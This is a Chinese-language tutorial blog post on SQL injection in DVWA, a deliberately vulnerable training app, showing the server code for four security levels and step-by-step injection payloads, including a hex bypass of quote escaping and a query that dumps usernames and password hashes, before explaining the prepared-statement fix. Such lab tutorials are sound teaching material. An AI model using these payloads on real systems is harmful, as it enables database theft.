新手教程-DVWA全級(jí)別教程之SQL Injection

系統(tǒng)環(huán)境

因?yàn)榫W(wǎng)上關(guān)于dvwa的相關(guān)資料都比較舊,所以想重新過一邊dvwa的各個(gè)類型的漏洞,順帶初步入門php代碼審計(jì)相關(guān)的知識(shí)。環(huán)境安裝可以直接參照網(wǎng)上教程新手指南:手把手教你如何搭建自己的滲透測(cè)試環(huán)境,已經(jīng)寫的非常詳細(xì),可以直接按照教程一步步安裝。

簡(jiǎn)介

SQL Injection,即SQL注入,是指攻擊者通過注入惡意的SQL命令,破壞SQL查詢語句的結(jié)構(gòu),從而達(dá)到執(zhí)行惡意SQL語句的目的。SQL注入漏洞的危害是巨大的,常常會(huì)導(dǎo)致整個(gè)數(shù)據(jù)庫被“脫褲”,盡管如此,SQL注入仍是現(xiàn)在最常見的Web漏洞之一。近期很火的大使館接連被黑事件,據(jù)說黑客依靠的就是常見的SQL注入漏洞。

手動(dòng)注入思路

自動(dòng)化神器sqlmap固然好用,但是還是要掌握一些手工注入的思路,接下來介紹一些手工注入的步驟。
1.判斷是否存在注入,注入是字符型還是數(shù)字型
2.猜解SQL查詢語句中的字段數(shù)
3.確定顯示的字段順序
4.獲取當(dāng)前數(shù)據(jù)庫
5.獲取數(shù)據(jù)庫中的表
6.獲取表中的字段名
7.下載數(shù)據(jù)
下面對(duì)四種級(jí)別的代碼進(jìn)行分析


image.png

Low服務(wù)器端核心代碼

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

可以看到,low級(jí)別代碼對(duì)來自客戶端的參數(shù)id沒有進(jìn)行任何的檢查和過濾,存在明顯的SQL注入。
漏洞利用
在現(xiàn)實(shí)場(chǎng)景中不可能看到后端的代碼,所以下面的手動(dòng)注入步驟是建議在無法看到源碼的基礎(chǔ)上
1.判斷是否存在注入,注入是字符型還是數(shù)字型

image.png

輸入1'or'1'='1,查詢成功。
image.png

輸入1'and'1'='2,查詢失敗,返回結(jié)果為空
image.png

說明存在字符型注入
2.猜解SQL查詢語句中的字段數(shù)
通過order by猜解
輸入1‘or 1=1 order by 1 # ,查詢成功
image.png

輸入1'or 1=1 order by 2 #,查詢成功
image.png

繼續(xù)輸入,1'or 1=1 order by 3 #,查詢失敗
image.png

說明執(zhí)行的SQL查詢語句中只有兩個(gè)字段,這里就是First name,Surname。這里也可以通過輸入union select 1,2,3...來猜解字段數(shù)
3.確定顯示的字段順序
輸入1' union select 1,2 #,查詢成功。
image.png

說明執(zhí)行的SQL語句為select First name,Surname from table where ID='id'....
4.獲取當(dāng)前數(shù)據(jù)庫
輸入1' union select 1,database() #,查詢成功;
image.png

當(dāng)前數(shù)據(jù)庫為dvwa。
5.獲取數(shù)據(jù)庫中的表
輸入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,查詢成功
image.png

當(dāng)前數(shù)據(jù)庫有兩個(gè)表,guestbook,users.
6.獲取表中的字段名
輸入 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #,查詢成功。
image.png

表中共有八個(gè)字段,分別是user_id,first_name,last_name,_user,password,avatar,last_login,failed_login.
7.下載數(shù)據(jù)
輸入1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,查詢成功
image.png

Medium服務(wù)器端核心代碼

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

可以看到,Medium級(jí)別的代碼利用mysql_real_escape_string函數(shù)對(duì)特殊符號(hào)\x00,\n,\r,,’,”,\x1a進(jìn)行轉(zhuǎn)義,同時(shí)前端頁面設(shè)置了下拉選擇表單,希望以此來控制用戶的輸入。


image.png

漏洞利用
雖然前端使用了下拉選擇菜單,但是我們依然可以通過抓包修改參數(shù),提交惡意構(gòu)造的查詢參數(shù)。
1.判斷是否存在注入,注入是字符型還是數(shù)字型,
抓包修改參數(shù)id為1' or 1=1 #,報(bào)錯(cuò)


image.png

抓包修改參數(shù)id為1 or 1=1 #,查詢成功
image.png

說明是數(shù)字型注入。(由于是數(shù)字型注入,所以服務(wù)器端的mysql_real_escape_string函數(shù)就形同虛設(shè)了,因?yàn)閿?shù)字型注入并不需要借助引號(hào)。)
2.猜解SQL查詢語句中的字段數(shù)
抓包修改參數(shù)id為1 order by 3 #,報(bào)錯(cuò)


image.png

說明執(zhí)行的SQL查詢語句中國(guó)的字段只有兩個(gè)字段,即這里的First name,Surname。
3.確定顯示的字段順序
抓包更改參數(shù)id為 1 union select 1,2 #,查詢成功。
image.png

說明執(zhí)行的SQL語句為select First name,Surname from 表 where ID=id....
4.獲取當(dāng)前數(shù)據(jù)庫
抓包更改參數(shù)id為1 union select 1,database() #,查詢成功;
image.png

說明當(dāng)前的數(shù)據(jù)庫為dvwa。
5.獲取數(shù)據(jù)庫中的表

抓包修改參數(shù)id為1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,查詢成功。


image.png

說明數(shù)據(jù)庫dvwa中的兩個(gè)表,一個(gè)guestbook和users
6.獲取表中的字段名
抓包更改參數(shù)id為1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #,查詢失敗。
image.png

因?yàn)閱我?hào)被轉(zhuǎn)譯了,變成了'??梢岳?6進(jìn)制進(jìn)行繞過,抓包更改參數(shù)id為
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #
image.png

說明users表中有八個(gè)字段,分別是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。
7.下載數(shù)據(jù)
抓包修改參數(shù)id為1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,查詢成功:
image.png

這樣就得到了users表中所有用戶的user_id,first_name,last_name,password的數(shù)據(jù)。

High服務(wù)器端核心代碼

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?>

可以看到,與Medium級(jí)別的代碼相比,High級(jí)別的只是在SQL查詢語句中添加餓了LIMIT 1,希望以此控制只輸出一個(gè)結(jié)果。
漏洞利用
雖然添加了LIMIT 1,但是我們可以通過#將其注釋掉,由于手工注入過程與Low級(jí)別差不多,所以直接演示最后一步下載數(shù)據(jù),輸入1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,查詢成功

需要特別提到的是,High級(jí)別的查詢提交頁面與查詢結(jié)果顯示頁面不是同一個(gè),也沒有執(zhí)行302跳轉(zhuǎn),這樣做的目的是為了防止一般的sqlmap注入,因?yàn)閟qlmap在注入過程中,無法在查詢提交頁面上獲取查詢的結(jié)果,沒有了反饋,也就沒辦法進(jìn)一步注入。


Impossible服務(wù)器核心代碼

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到,Impossible級(jí)別的代碼采用了PDO技術(shù),劃清了代碼與數(shù)據(jù)的界限,有效防御SQL注入,同時(shí)只有返回的查詢結(jié)果數(shù)量為一時(shí),才會(huì)成功輸出,這樣就有效預(yù)防了“脫褲”,Anti-CSRFtoken機(jī)制的加入了進(jìn)一步提高了安全性。

參考文章

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • sqlmap用戶手冊(cè) 說明:本文為轉(zhuǎn)載,對(duì)原文中一些明顯的拼寫錯(cuò)誤進(jìn)行修正,并標(biāo)注對(duì)自己有用的信息。 ======...
    wind_飄閱讀 2,206評(píng)論 0 5
  • SQL Injection SQL Injection,即SQL注入,是指攻擊者通過注入惡意的SQL命令,破壞SQ...
    網(wǎng)絡(luò)安全自修室閱讀 948評(píng)論 0 0
  • sqlmap是一個(gè)開源的滲透測(cè)試工具,可以用來進(jìn)行自動(dòng)化檢測(cè),利用SQL注入漏洞,獲取數(shù)據(jù)庫服務(wù)器的權(quán)限。它具有功...
    道書簡(jiǎn)閱讀 1,568評(píng)論 0 0
  • 1.何為Sql注入? 所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請(qǐng)求的查詢字符串,最...
    打傘De魚閱讀 1,501評(píng)論 0 7
  • DVWA實(shí)踐 Web漏洞原理 1. DVWA環(huán)境搭建 Warmpserver+DVWA 2. Brute Forc...
    JasonChiu17閱讀 3,951評(píng)論 0 19

友情鏈接更多精彩內(nèi)容